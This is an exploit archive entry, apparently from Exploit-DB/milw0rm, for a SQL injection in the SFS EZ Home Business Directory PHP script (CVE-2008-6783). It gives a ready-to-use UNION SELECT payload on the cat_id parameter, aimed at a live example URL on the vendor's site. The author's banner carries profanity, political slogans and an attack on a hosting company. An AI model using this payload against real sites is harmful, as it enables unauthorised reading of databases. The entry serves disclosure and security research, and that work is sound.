SFS EZ Home Business Directory cat_id SQL Injection Vulnerability

2008-10-31T00:00:00
ID EDB-ID:6907
Type exploitdb
Reporter BeyazKurt
Modified 2008-10-31T00:00:00

Description

SFS EZ Home Business Directory (cat_id) SQL Injection Vulnerability. CVE-2008-6783. Webapps exploit for php platform

                                        
                                            #######################################################
# Author : BeyazKurt
# Contact : BeyazKurt@BSDMail.Com
# Site : www.khg-crew.ws - KOSOVA HACKERS GROUP
# LAHEY mahkemesini kiniyoruz. FUCK THE JUSTICE!
#
# Script : SFS Home Business Directory
# Price: $ 24.95
# Script Site: http://scripts-for-sites.com/item.php?item=113
#
# D0rk : "sie go. amk iÅŸinizmi yok xD"
#
# SQL Injection Vuln. :
#
# Exploit : SITE.COM/[path]/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# Example: http://homebiz.scripts-for-sites.com/directory.php?ax=list&sub=1&cat_id=1+union+select+0,1,version(),database()/*
#
# -------------------------------
#                       Ya RAMADHAN
#              INDEPENDENT KOSOVA (H) - Etnic ALBANIA (H)
#  pigs for dedication : WE Are Don't Forget Kosova, Drenica, Srebrenica And All Genocide !!
#                      Proud 2 Be ALBANIAN !
#
# bütün emocu,punkci zartci zurtcularin Aq!  Anti-Tikky.Com anti-tikiyiz xD
#
# ONEMLI Not Expo Bilisimden host almayin. Serefsizler daha sunucu yonetmeyi bilmiyor bide ustune musteriyi keklemeye calisiyo. Yakinda kanitlariyla r10da yayinlicam ;)
# Demistim rezil edicem sizi ;)
#
#######################################################

# milw0rm.com [2008-10-31]